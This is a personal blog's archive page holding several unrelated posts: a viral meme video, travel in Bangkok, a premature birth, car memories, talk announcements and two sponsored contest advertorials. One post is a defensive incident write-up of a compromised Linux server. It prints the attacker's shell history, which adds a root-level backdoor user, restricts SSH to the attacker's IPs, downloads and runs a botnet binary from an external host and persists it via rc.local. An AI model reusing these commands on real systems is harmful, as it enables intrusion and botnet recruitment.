Going Almost Viral On Facebook – Yusuf Taiyoob Meme

Almost viral? Isn’t that like almost famous, or almost rich? Yah it’s not famous, or rich or in this kind viral (even though it kinda is). Anyway.

I make funny videos on instagram sometimes, I made a bunch in Europe in different countries (I meant to do one for each country, but yah I failed at that). You can see them on Instagram with the hashtag #daviesfunnyvids.

So I always knew the formula for success was a white dude speaking BM, so I did a video in that format around Hari Raya because the Yusuf Taiyoob adverts on the radio are too hilarious. If you’re not familar, they are near pornographic.

The most famous Yusuf Taiyoob meme image would be this one I guess:

Yusuf Taiyoob

Anyway I did my video about this, and it was kinda popular. It was ok on Instagram but it got a little bit wild on Facebook.

Ending up with over 600 likes, over 250 comments and over 1300 shares. Not too bad right, I thought it’d could have gotten much more but I just don’t have that kind of audience.

But then someone stole it, who did have the right kind of audience, guess what happened? Yah it went nuts haha with almost 16,000 likes and almost 6000 shares but no credit back to me and it wasn’t shared from the original video (they basically downloaded it, then re-uploaded on their own page).

Stolen Viral Video

What can I do? Nothing really, just enjoy the fact that I did get some kind of popularity from the video haha. I still have about 400 pending friend requests from that period.

There was even some people meme-ing me, as apparently to every Malay person I look like the WWE wrestler Big Show. Yah every time I buy a Ramly burger, it’s almost guaranteed the chap selling the food will say “Wah, abang macam big show lehh”.

Big Show Makan Kurma

So yah, it was fun, it was interesting, I shall have to think of more funny videos that I can do speaking BM.

That was my 20 minutes of fame I guess.

Tags: , , , , , , , , , , ,

Continue Reading · No Comments · Internet & Tech, Weird/Humour

Learn Stock Trading – It Can Be Fun!

I’ve always had a certain interest in stock trading and finance and always wanted to learn stock trading, learn more about how it works, how to benefit it from it etc. But most of the resources about it are dry, tedious and cover fascinating topics like technical analysis.

I have some investments in the stock market, but not directly, via a Unit trust. And I do have some investment in Gold, which of course is a completely different market to stocks (with it’s own challenges). I do like numbers though and challenges, so through-out the years I’ve always been picking up knowledge here and there about the different types of investments and trading (futures, forex, stocks, shares etc).

Learn Stock Trading

I even bought this book more than 10 years ago, but it put me to sleep every time I tried to read it. And all the new language to learn (bullish, bid size, ask size, ask price, percentage spreads, closed-end funds etc).

Financial Times Book

It can be quite a daunting subject to learn about, and of course it concerns money so people’s first instinct is to play it safe. So yah, that didn’t help much.

Now I have a child, I have to think about his future too, and of course it’s important to me that he be financially smart and make informed choices on what to do with his resources. What I found recently was an interesting online virtual trading challenge based around real-time data from Bursa Malaysia by KenTrade by Kenaga.

It simulates real equity market trading very closely and can demonstrate it’s not actually that complex, with the added bonus if you do find yourself really good at it – you can win yourself a Volkswagen Jetta worth RM130,888. And well, how else are you going to get to trade with RM1 Million? Haha.

KenTrade by Kenaga

You don’t have to be top to get something too, if you are one of the top 66 participant with the highest percentage growth in your virtual portfolio, you stand the chance to win a cash prize (to get the car you have to be in the top 20).

You don’t have to be top to get something too. If you are one of the top 33 participants in the public and student category respectively with the highest percentage growth in your virtual portfolio, you stand the chance to win a cash prize (to get the car you have to be in the top 10 in these categories).

If you do wanna try it out, head over to https://game1.kentrade.com.my/KenTradeGame/ and sign up for the Kentrade Trading Challenge by Kenanga or you can head over to https://www.kentrade.com.my/KenTrade/ to find out more.

Contest runs from October 13 to November 7, while registration ends on October 20. Upon signing up, send a screenshot of your registration and quote ‘ShaolinTiger’ over to KenTrade@kenanga.com.my and stand a chance to win a mystery prize!

Tags: , , , , , , , ,

Continue Reading · No Comments · Advertorial

Bangkok – Our Favourite City in Asia? And Some Tips

So yah, Bangkok..I was supposed to write this post back in 2011 sometime I guess haha, I started with 1 picture in October 2011 but it got kinda stuck there.

We really love Bangkok, we’ve been back a couple of times since – but this was our first trip so it was kind of special and it was a surprise birthday trip for Kim as well. I was trying to be more romantic, proactive etc as I was a bit of a bum most of the time haha. Plus she’d mentioned MANY times she wanted to go shopping there, check out Chatuchak etc.

Anyway I decided on Bangkok as I’d heard so many good things about it, we’d both been to Thailand and absolutely loved the food and people there but we’d never really explored Bangkok properly, and definitely not together so I went for it, I booked with AirAsia go and chose a cute boutique-ish hotel bang in the middle of Chinatown called Shanghai Mansion.

Bangkok has a whole bunch of cute and quirky hotels at reasonable prices, so do have a look outside of the chains for something different.

Anyway we arrived safely and checked in, and we were hungry, seen as though it was birthday girls weekend I let her choose what to eat…she chose to eat a whole suckling pig right next to the hotel and it was AWESOME. You can see her post about it here – The suckling pig in Bangkok.

Roast Suckling Pig

It was a bit different from the style we get here in Malaysia, it was nice but honestly we preferred how they do it here. The cool part was though they stir fried the rest of the meat with salt and pepper, which made a delicious dish to eat with our rice/veges.

We lucked out staying in Chinatown too and discovered one of our absolute favourite restaurants in Bangkok just walking distance from our hotel, more here – T&K Seafood in Bangkok’s Chinatown.

What we really adore about Thailand and especially Bangkok is the street food, it’s EVERYWHERE, it’s cheap, there’s loads of pork and it seems impossible to have a bad meal in Thailand. I mean just look at how amazing their chap fan/mixed rice is:

Thailand Mixed Rice

One thing you fast learn about Bangkok is, stick to taxis if you want to get somewhere in comfort. Taking a tuk tuk is fun, but only do it for that reason. A tuk tuk is not really any cheaper than a taxi (unless you’re perhaps a local), there’s no aircon, if it rains it sucks, if you get stuck behind something spewing diesel fumes it sucks and they will constantly hassle you to make ‘stops’ to help them out.

Every stop you make will reduce your fare by 20-40baht but take about 10-20 minutes each time, it’s worth doing once maybe just for fun. We actually did 3 stops just for shits and giggles and got the tuk tuk ride for free.

Tuk Tuk ride

But if you want to get anywhere just take a taxi, another important lesson to note – ALWAYS hail a moving cab, never take one parked at the road side (they tend to be the lazy, unscrupulous drivers).

As far as food goes there a few dishes you absolutely must try the authentic versions of in Thailand, one is Pad Kra Pao (or Krapow) which is basically minced pork fried with loads of basil – super delicious. This one was inside Chatuchak market:

Pad Kra Pao

The other is of course braised pig leg rice which you can find everywhere and the good ones will simply blow your mind. Talking of Chatuchak, the place is immense and there’s a LOT of people, if I can give you one tip for Chatuchak it is – if you see something you like, just buy it, because the chance of you being able to locate the same stall again is slim to none.

Chatuchak Market

The birthday girl had a great time shopping of course and LOVED Chatuchak market as expected.

Kimberlycun at Chatuchak

The other place we’d heard a lot about was Platinum Mall so we spent a day there to check it out. Talking of stewed pork leg, the one at the Platinum Mall food court is definitely one of the best ones I’ve had, so if you do head there – check it out!

Platinum Mall - Bangkok

Platinum mall is like a smaller, more comfortable version of Chatuchak with aircon and much easier to navigate. The major downside I noticed was there’s very little mens stuff in Platnium, compared to Chatuchak which also has other interesting sections (home, gardens, pets etc).

But the shopping experience at Platinum is much less sweaty and the food in the food court is tops! But even then, we still headed back to Chatuchak the next day for another go haha, and we managed to locate the legendary coconut ice cream, another memorable food from BKK.

Chatuchak Coconut Ice-cream

So yah that sums up Bangkok pretty much, shop, food, shop, food, massage, pass out – wake up and repeat. Super awesome!

Kinda miss Bangkok actually, can’t wait to take Liam there! Although now I’m older, I kind of enjoy the serenity of Bali too. Ah so many places to go…haven’t even been to Japan at all yet!

Tags: , , , , , , , , , , ,

Continue Reading · 2 Comments · Thailand, Trips & Travel

What It’s Like To Be The Father Of A Premature Baby (Premie)

Pregnancy itself is a roller-coaster, even the ideal pregnancy I would imagine is quite a stressful experience for the first time parents (especially the one with a tiny human growing in her belly). We honestly did not have the easiest pregnancy, at some points it was downright terrifying – especially seeing blood during the exact time when we were supposed to announce to the World that we were having a baby. The magical 3 months mark – Red tide.

And yes it happened again in May, not a good sign, but nothing we could do – nothing the Doctor could tell us..and upon reading far too much, is fairly normal (happens to about 20% of pregnant women). The only bad part, was it’s a fairly strong indicator of premature birth.

There’s 2 things in life I really strongly dislike, complaining and worrying (almost the same thing in fact..). Worry is pointless, if you can do something about it, do it. If you can’t, worrying isn’t going to change anything. Same for complaining, don’t complain, do something to change it, fix the situation, take action – don’t just whinge.

A lot of it can be alleviated by knowledge anyway, read, read, educate yourself and it becomes a lot easier to not worry (or the opposite sometimes when you read too much). Anyway, that’s my philosophy in life and I had to work extra hard to maintain it at certain points during the pregnancy, as it wasn’t an easy one in general.

On the whole it was wonderful though, Kim felt great and she was a glowing, beautiful, vibrant surprise pregnant lady (we consider a surprise mom when you see a hot chick from the back and she turns to the side or around and boom there’s a massive baby bump). She had very few serious symptoms, some morning sickness early on, no really crazy cravings, not much pain/discomfort. Other than the blood etc, it was a textbook pleasant pregnancy.

It was pretty stressful though, every day without blood was a blessing. Then things escalated fairly quickly, 11th July (around 29 weeks gestation) we had ‘The Show’ which is technically the body of the mother saying it’s ready to party, let’s get the baby out. I saw what looked an awful lot like a mucus plug (yes I Google Imaged it..I don’t recommend doing that).

This is when I started reading voraciously about all kinds of symptoms, probabilities, birth stages (micro preemies, early preemies, moderately premature etc etc), and was hoping we could make it to at least 34-35 weeks gestation as our little man would be pretty much fully developed by then and fairly well equipped to come out.

After ‘The Show’ we went to A&E and called our Doctor in to check things out, she said the cervix was a little soft and having a look at the picture of the mucus plug..she said it did very much look like a show and we needed to take precautions for premature birth – which is basically 2 steroids shots 12 hours apart to help along the lung development of the little one when he comes out.

As far as babies go, all systems are pretty much go from 28 weeks onwards, but the lungs are last to develop and be ready to take in outside air. Preemie lungs have issues due to a lack of surfactant which basically lubricates all the little tubes and stops them collapsing.

Most premature babies are born with some kind of respiratory distress (Which is why you see them on breathing apparatus). Anyway the earliest preemie stage which is unlikely to have any serious long term effects in 32 weeks, also has a 98% survival rate – which is good obviously.

Anyway after the steroid shots Kim just took it easy and was pretty much on bed rest, not moving a whole lot. We were just hoping and praying (in a non-religious way) that he would stay in as long as possible, as the last few weeks of gestation are when there is exponential growth and development of the body, brain, immune system, nervous system and much more.

So yah, July 30th I was supposed to go to the office, but Kim didn’t seem to be feeling to well, and I just had a bad feeling and thought I should stay at home. Lucky I did as the missus stayed in bed all day, she went to pee around 5pm and I heard a scream from upstairs.

I rushed up and found a wet floor..which I examined closely (yes I smelt it)…you smell it to make sure it’s not pee, to make sure it has no foul smells and you check it to make sure it’s clear and has no black/green tint. A black/green tint would indicate the baby is not coping well and needs to come out ASAP (emergency C-section).

The water had broken, but it didn’t seem to be a lot..you can read this part from Kim’s perspective too here: I have popped and this is how it went down..

Anyway, however little or much water broke (I suspected it was the hind waters, not the main sack) we rushed to the hospital and went straight into a labour room. I read up and found the probability of going into labour in the next 24 hours was 50% or higher. I was hoping we were in the other 50% that could go 4-6 weeks with a drip/leak/hind water burst as amniotic fluid does constantly regenerate and after an ultrasound the main sac was still full.

Stay positive and all that, I hung out in the hospital till about 3am then went home to get some sleep. There was no contractions or major dilation (around 1cm) so we were hopeful that he could stay in until at least 36 weeks.

But no, he wasn’t having any of it. I got a panicked call from Kim around 10am saying it was on, she was having major contractions and they’d started at about 5.30am and were getting closer and stronger.

I decided I should probably go into the hospital, so I packed the bag full of stuff we might need and off I went.

It was all very sudden, we seriously had nothing ready – we had a stroller and a car seat I bought because I saw the exact model we wanted on sale. But literally nothing else, no clothes, no diapers, no cot, nothing.

I got to the hospital and Kim was already super drowsy from the gas and air she was sucking on like a crack pipe, she wouldn’t let it go. I have to say, that contraction business looks bloody painful. By about 11am she was screaming for an epidural, but the Doctor said it was too late, she was already 6cm dilated (so 60% of the way there), her contractions were too close together and she was progressing that fast it was going to be over soon anyway.

She was grabbing my hand so hard my fingers almost dropped off (ribena purple they were), but hey, I was happy to bear that rather than pooping out a 2kg human from any of my body orifices.

Things went pretty fast and our son was born pretty smoothly at 1.52pm July 31st 2014 without complications at 32 weeks 4 days (other than him being almost 8 weeks early) his due date was September 22nd. So yah, he was supposed to be born yesterday (relative to when the this post was written).

But as someone so wonderfully put it, this way we get to spend an extra 2 months with him!

Seeing your wife give birth naturally (or even cesarean I would imagine) is not an experience for the faint hearted, government hospitals no longer let the fathers be present during birth as they just don’t have enough resources to deal with all the fainting/puking etc.

Thankfully my constitution is ok I think as I managed to stay concious through-out the entire thing, and didn’t puke and even took some pictures of ‘that’ moment. Although I wasn’t exactly looking directly, so I think they are blur/overexposed haha.

This is how he looked when he was born, covered in the waxy vernix layer, goo and blood having any residual amniotic fluid/gunk sucked out of his nose/mouth with a tube wrapped in a plastic bag to keep him warm. The first thing he did? Peed on the nurse – good lad! Not exactly cute at this stage tho.

32 Week Old Premature Baby

Kim was fine afterwards just tired, she had a sleep and I went to see baby Liam in NICU (neonatal intensive care unit) where we spent many hours for the next 3 and a half weeks. More about that later, I took her up to see him the same day so they could meet the day he was born. We couldn’t hold him yet though as he was still on the CPAP machine (Continuous Positive Airway Pressure) as he did have some respiratory distress.

So the first time mommy and me could hold him was the first day after his birth. He even opened his eyes a bit and grabbed my finger like a little boss, we were so proud that he was already off the CPAP and onto the regular nasal prongs. Far cuter, like a little wrinkly old man.

32 Week Preemie

So yah, that’s the story of our pregnancy and birth from my perspective, and the first thoughts/feeling of being the father of a premature baby. My #32weeker :)

If you want to see far too much of him, just follow me on Instagram @ShaolinTiger and his Mommy at @Kimberlycun.

Tags: , , , , , , , , , ,

Continue Reading · 2 Comments · Children, Family

Advanced Information Gathering AKA Google Hacking at HITB 2004

So this was the first real talk I gave, I’d just moved to Malaysia not long beforehand and I’d started work at NSS as the lead for the penetration testing team. We were a sponsor of Hack in the Box 2004 so we got a speakers slot, but it couldn’t be a product/company pitch it had to be a proper infosec/technical talk which passed the regular CFP (Call for paper) requirements.

It was decided that I give the talk..I was very nervous as you can imagine, even back then it was rather a large conference, and this was my first real shot at talking. Looking back at the slides 10 years later though, I think I did a pretty good – much of the information is still relevant today.

And when I gave the talk the room was packed, people were standing and listening. I think because it was actually one of the less technical talks, more people could enjoy it – it went down really well. The subject was something I did at work, and often the first stage in a penetration test – information gathering. Arguably it’s also the most important phase as it gives you all the entry points and people to target in later phases. The hot keywords at that time were Google Hacking and the GHDB (Google Hacks Database).

Information Gathering AKA Google Hacking

It was about 6 years after this that I gave me next talk, not sure why – perhaps just lack of opportunity. I also did an interview with The Star afterwards titled Guarding against Google hacking, where I met Chris Chong.

Google Hacking - The Star

The talk covers the lesser known aspects of Google, tools such as Athena and Sitedigger and the amount of random misconfiguration that can be found with a little careful search engine manipulation. Other useful public databases will be covered with some details on how to leverage the maximum amount of detail on any given target.

Also an introduction to the Google API and how it can be used or abused during a penetration test or hack attempt. This presentation will include a live demonstration in which the above techniques will used to gather coveted information about both random and targeted organizations.

So here are the slides:

And the video (yah we had recordings back then, shared via Torrent!):

Enjoy!

You can see all my talks given here.

Tags: , , , , , , , , , ,

Continue Reading · No Comments · Hacking & Infosec

An Anatomy Of A Hack – Weak ROOT Password

So a peaceful Sunday night, I get an odd bandwidth warning for a development/testing server that a developer recently created. It was doing some fairly immense traffic, peaking at 80mb a second and averaging about 8mb/s – definitely not normal.

Image 2014-08-31 at 8.42.18 PM

I tried to access the server via SSH but couldn’t connect at all, port 22 was connection reset by peer (which indicates a block or drop) and our normal port wasn’t responding at all.

I accessed the server via the Linode LISH console, but it wasn’t accepting any of our secure passwords, so I shut it down and used the Linode manager to reset the root password. This then allowed me to boot it up and access it via LISH with the root user.

What I discovered next was the reason why I couldn’t SSH in either on port 22 the default port, or our regular SSH port (which is not 22). I could see from these lines in the .bash_history for root that SSH had been blocked for everyone except 2 IP addresses.

    9  echo "sshd:121.12.168.62"  >> /etc/hosts.allow
   10  echo "sshd:37.48.73.19"  >> /etc/hosts.allow
   11  echo "sshd:ALL"  >> /etc/hosts.deny

Which would prevent any SSH access at all.

So they logged in, created a user called restart, blocked everyone but 2 IP addresses from accessing via SSH, then downloaded a piece of malware (or what I assume to be a botnet client) from the first IP address http://121.12.168.62:6789/com

Then they ran this, and added it to /etc/rc.local to make sure it runs on restart. Here’s the full history:

    1  w
    2  uname -a
    3  ethtool eth0
    4  ifconfiog
    5  ifconfig
    6  last
    7  useradd -g 0 -u 0 -o restart
    8  echo restart:restart |chpasswd
    9  echo "sshd:121.12.168.62"  >> /etc/hosts.allow
   10  echo "sshd:37.48.73.19"  >> /etc/hosts.allow
   11  echo "sshd:ALL"  >> /etc/hosts.deny
   12  cd /tmp/scp
   13  ls
   14  chmod 777 *
   15  ./x 5.153
   16  ls
   17  chmod 777 *
   18  ./x 5.153
   19  cd /etc
   20  wget http://121.12.168.62:6789/com
   21  chmod 0755 com
   22  ./com &
   23  chattr +i com
   24  echo "cd  /root/">>/etc/rc.local
   25  echo "./com&">>/etc/rc.local
   26  echo "/etc/init.d/iptables stop">>/etc/rc.local

I uploaded the malware to VirusTotal to scan it and see what it turned up:

VirusTotal Scan

The only decent description I found was from Telus:

Backdoor.Linux.Ganiw.A is a Backdoor and Bot agent that targets the Linux platform. The malware contacts a remote server, identifying itself, and sending system information. In addition, it receives control commands to perform various nefarious activities on the infected system. Moreover, the malware has the capabilities to embark on different types of DoS attacks. To survive a system reboot, it adds an entry to the initialization directory “/etc/init.d”.

As for the actual entry, it seems like the password was popped by a different IP address (Also from China), and then later on the same day, it was logged into by our main IP address 121.12.168.62.

Aug 30 01:46:43 li737-216 sshd[20132]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:46:45 li737-216 sshd[20134]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:46:47 li737-216 sshd[20134]: Failed password for root from 60.172.228.102 port 4670 ssh2
Aug 30 01:46:58 li737-216 sshd[20134]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 4670 ssh2]
Aug 30 01:46:58 li737-216 sshd[20134]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:00 li737-216 sshd[20136]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:01 li737-216 sshd[20136]: Failed password for root from 60.172.228.102 port 4526 ssh2
Aug 30 01:47:12 li737-216 sshd[20136]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 4526 ssh2]
Aug 30 01:47:12 li737-216 sshd[20136]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:14 li737-216 sshd[20138]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:15 li737-216 sshd[20138]: Failed password for root from 60.172.228.102 port 3781 ssh2
Aug 30 01:47:25 li737-216 sshd[20138]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 3781 ssh2]
Aug 30 01:47:25 li737-216 sshd[20138]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:27 li737-216 sshd[20140]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:29 li737-216 sshd[20140]: Failed password for root from 60.172.228.102 port 4405 ssh2
Aug 30 01:47:39 li737-216 sshd[20140]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 4405 ssh2]
Aug 30 01:47:39 li737-216 sshd[20140]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:41 li737-216 sshd[20144]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:44 li737-216 sshd[20144]: Failed password for root from 60.172.228.102 port 1662 ssh2
Aug 30 01:47:54 li737-216 sshd[20144]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 1662 ssh2]
Aug 30 01:47:54 li737-216 sshd[20144]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:55 li737-216 sshd[20146]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:57 li737-216 sshd[20146]: Failed password for root from 60.172.228.102 port 4220 ssh2
Aug 30 01:47:57 li737-216 sshd[20146]: Accepted password for root from 60.172.228.102 port 4220 ssh2

Then the login:

Aug 30 01:47:57 li737-216 sshd[20146]: Accepted password for root from 60.172.228.102 port 4220 ssh2
Aug 30 10:17:56 li737-216 sshd[21293]: Accepted password for root from 121.12.168.62 port 3117 ssh2

As a rule I disable root login via SSH, move it to a different port (not 22), disable password based logins, and use a limited list of users that can access SSH. This makes it pretty secure and can be done with the following SSH settings:

Port 888
PermitRootLogin no
PasswordAuthentication no
AllowUsers YOURALLOWEDUSER

Then restart SSHd of course. Generally choose a port below 1024, as then it’s still a privileged port and can’t be hijacked by a non-root user (for the paranoid).

This server was only 11 days old, fortunately it has nothing important on it and doesn’t have access to anything else. Just be warned, even if you are disabling root login later, put a secure password in from the start..as you might forget about the server for a while.

And then it’ll get owned by some Chinese hacker and turned into part of their botnet for hire.

There’s really not ever any excuse to have a weak root password.

Tags: , , , , , , , , ,

Continue Reading · 2 Comments · Hacking & Infosec

Oldskool Car Porn: The 1990 Lotus Carlton

I can never forget this car, seriously. My uncle drove a lot for work, I never knew exactly what he did, but he was the first person I knew that owned a laptop. He worked in some kind of manufacturing industry and was possibly a rep/salesman.

Which suits this car, well the original version anyway – the rather boring Vauxhall Carlton (along with the Ford Sierra) was a stock 90s salesman car.

1986 Vauxhall Carlton

Certainly not the most exciting car on the block. Until 1990 anyway.

I remember my uncle was looking for a new car and I happened to join him as he’d found a Lotus Carlton he’d like to look at, he didn’t know much about the car, and well nor did I. There wasn’t a whole lot of Internet back then, and there certainly wasn’t the abundance of information on sites like Wikipedia. It just so happened the car he wanted to look at was near where I lived, so he was coming down from Birmingham to have a look. I’d guess this was probably around 1992-1994 period, so the car was likely new, or barely used (1-2 years old).

When I saw it, I was like..is that it? I was pretty underwhelmed to be honest. For a £48,000 car (which was an enormous amount of money back then).

Lotus Carlton

Even the interior was kind of drab, dull and plasticy. It just had the odd Lotus emblem here and there.

Lotus Carlton Interior

Little did I realise this was a 377bhp, 3.6L twin turbo BEAST which could reach 100mph (160km/h) in less than 17 seconds. So we sat it in, took it for a test drive. It seemed fairly ordinary as we tootled around, then we reached the sliproad to the motorway.

We weren’t going slow, my uncle was in third gear as he reached the merge and he accelerated hard to pull onto the motorway at a decent speed (as you would)..the car span its wheels like a drag bike on a leash.

And once it found grip…it pressed my head so hard into the back of the seat I thought my eyeballs were going to collapse. It was quite an eye watering ride.

And yah, at that point I realised this car was really something special. I read whatever I could about it and was amazed to find that it could outperform the top supercars of that era like the Ferrari Testarossa which could do 0-60mp/h in only 5.3 seconds and had a top speed of 180mph (only 3 mph more than the Carlton!).

For a 4 door sedan..full of people, speeding along like a bullet train. Quite a crazy (and scary) proposition). Also the fact that it was a target for car thieves and criminals as the police didn’t have any cars fast enough to chase it made it a little unpractical.

Sadly my uncle didn’t buy the car, so I didn’t get to sit in it (or any other) ever again. There was only 320 Lotus Carlton’s released in the UK, so it is a rare car. Even now, 20+ years later they are fetching good money for mint condition examples (£12-20,000).

There is a modern day equivalent or a spiritual successor (in some ways), the Vauxhall VXR8.

But yah, something I still remember so vividly from my younger years. Some videos for reference..

Fifth Gear Vauxhall VXR8 vs Lotus Carlton

Top Gear Lotus Carlton

Autocar heroes: Lotus Carlton video review

Tags: , , , , , , , , ,

Continue Reading · No Comments · Cars/Motorsport

An Introduction To Information Security – OpenCoffeeClubKL #31

So I gave a talk about infosec stuff in July at OpenCoffeeClub KL, as it’s what I used to do for a living – people were always asking me to share a little more about it.

The timing is a little odd again, as it happens. In 2011 I did 2 talks in the same month, 1 on WordPress (High Performance WordPress – Scaling, Tuning, Optimizing & More) & one which was more random (The History Of The Future at WebCamp KL).

In 2012 I ended up doing 2 presentations in the same week (actually on 2 consecutive days), and once again the first was technical and the second a bit more random.

The first one was about MongoDB and was for the KL Mongo User Group AKA KL MUGHigh Availability MongoDB & Replica Sets – A How To & Kinda Tutorial.

The second was to a bunch of copywriters about blogging – Blogging WTF? At The Last Word KL – A Meeting For Copywriters.

I guess I skipped on 2013, and here I am in 2014 – giving 2 talks almost in the same month again, the first being this one actually and the second was Building Scalable Web Apps – LVL.UP KL – July 2014

My talk was about 15 minutes and titled “Introduction to Information Security” – which covers some basics on what Information Security is, how it can impact your business and some tips on how to mitigate against risk.

An Introduction To Information Security

Here are the slides:

And the video (the front got cut off slightly – but nothing important, only when I was talking about myself):

So yah, an introduction to infosec – if you do have any further questions drop them in the comments below!

You can see all my talks given here.

Tags: , , , , , , , , , , ,

Continue Reading · No Comments · Hacking & Infosec

My 6 Tips For Fuel Effeciency & Shell FuelSave Challenge 2014

Fuel economy is super important and is one of the reasons I recently changed to a new car as old cars tend to get less and less efficient as they get more age.

Fuel Efficiency

There are various things you can to increase your fuel economy which fall into 4 main categories:

  • Drive more efficiently (Drive smoothly, remove roofracks when not in use, change to higher gears faster etc)
  • Keep your car well maintained (Use the correct oil and follow the service schedule, inflate your tyres appropriately etc)
  • Plan and combined trips (Try and avoid traffic jams, combine trips where you can, don’t idle too much)
  • Choose a more efficient vehicle (Choose a Diesel car, or a hybrid or one of the newer more efficient models)

Shell is super passionate about helping Malaysian motorists to be more fuel efficient by making smart choices on the road and also with Shell FuelSave 95, which has Active Efficiency Ingredients designed to improve fuel and engine efficiency.

This year, if you take part in the Shell FuelSave Challenge 2014 you will be able to enhance your knowledge on making smart choices on the road through a new experience beyond the driving challenge by being part of an exciting online Shell FuelSave Journey with the opportunity to win exclusive prizes and rewards

Which brings us to the 6th annual Shell FuelSave Challenge, which showcases how easy it is for you to save fuel and become advocates for fuel efficiency coupled with using Shell FuelSave 95 which is optimized for greater fuel efficiency. It will be a great platform to learn more about fuel efficiency and educate yourself a little on things you can do, and choices you can make to increase your fuel economy.

Shell FuelSave Challenge 2014

To be a part of this year’s Shell FuelSave Challenge, you must be aged between 21 years and 60 years, with a minimum of two (2) years of driving experience. If you fulfil these criteria you can make your way to the Shell FuelSave Roadshows which will be held in four cities across the nation (Johor Bahru, Kuantan, Penang & KL) to answer a few simple questions and go through a short listing process.

Alternatively, you can register online for the Shell FuelSave Challenge and take part in the Shell FuelSave Journey here www.shell.com.my/fschallenge.

The grand prize is well worth a look as the four winners from each city will compete for RM20,000!. And well even if you don’t win anything, you’ll learn a lot more about making smart choices whilst driving with Shell FuelSave Tips and about Shell FuelSave 95.

Do you have any tips to share for saving fuel? Here are some of my personal tips:

  1. Don’t accelerate aggressively
  2. In traffic keep a good distance and look a few cars ahead to see what’s happening, this avoids excessive braking/acceleration
  3. If you have a turbo car, get a boost gauge and keep the vacuum pressure low (below 0.5bar) to save fuel
  4. Check your tyre pressures regularly and keep them inflated properly
  5. Use cruise control if you have it on the highway (this keeps your speed constant and improves fuel efficiency a lot)
  6. Don’t drive too fast

Remember to sign up here – www.shell.com.my/fschallenge.

Tags: , , , , , , ,

Continue Reading · No Comments · Advertorial

Building Scalable Web Apps – LVL.UP KL – July 2014

So the most recent LVL.UP KL meeting was about Internet Architecture (my speciality! yay) – and we had an amazing line-up of speakers – plus me.

Building Scalable Web Apps

It wasn’t my most coherent talk, due to my wife just giving birth (7 weeks early..) – so I was pretty tired and did the slides at 5am – not that should be an excuse haha. My talk was about Building Scalable Web Apps which covered a basic intro to scalability, 5 things to consider/think about and 5 things you can do to build at scale.

Anyway here are the slides:

I’m just sad my animated GIFs didn’t work in the live preso or on Slideshare – bah!

And the video of the talk:

If you have any comments/suggestions/feedback please do drop them in the comments below.

Enjoy!

You can see all my talks given here.

Tags: , , , , , , , , ,

Continue Reading · No Comments · Sys Admin & DevOps